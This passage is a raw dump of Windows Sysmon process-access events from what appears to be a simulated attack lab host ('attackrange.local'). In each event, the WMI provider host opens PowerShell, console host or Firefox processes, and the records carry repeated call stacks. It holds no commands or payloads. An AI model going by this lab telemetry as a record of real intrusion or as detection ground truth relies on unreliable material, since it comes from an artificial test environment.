Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149483Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-283A-60CA-2404-00000000D101}5252C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149482Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F803-00000000D101}6872C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149481Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F803-00000000D101}6872C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149480Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F703-00000000D101}5228c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149479Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F703-00000000D101}5228c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149478Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F603-00000000D101}6736C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149477Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F603-00000000D101}6736C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149476Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F503-00000000D101}6688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149475Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F503-00000000D101}6688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149474Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-269B-60CA-EA03-00000000D101}6156C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149473Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-269B-60CA-EA03-00000000D101}6156C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149472Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E103-00000000D101}4292C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149471Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E103-00000000D101}4292C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149470Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E003-00000000D101}5836c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149469Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E003-00000000D101}5836c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149468Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DF03-00000000D101}5496C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149467Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DF03-00000000D101}5496C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149466Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DE03-00000000D101}1224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149465Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DE03-00000000D101}1224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149464Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149463Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149462Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8D03-00000000D101}1960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149461Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8D03-00000000D101}1960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149460Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program 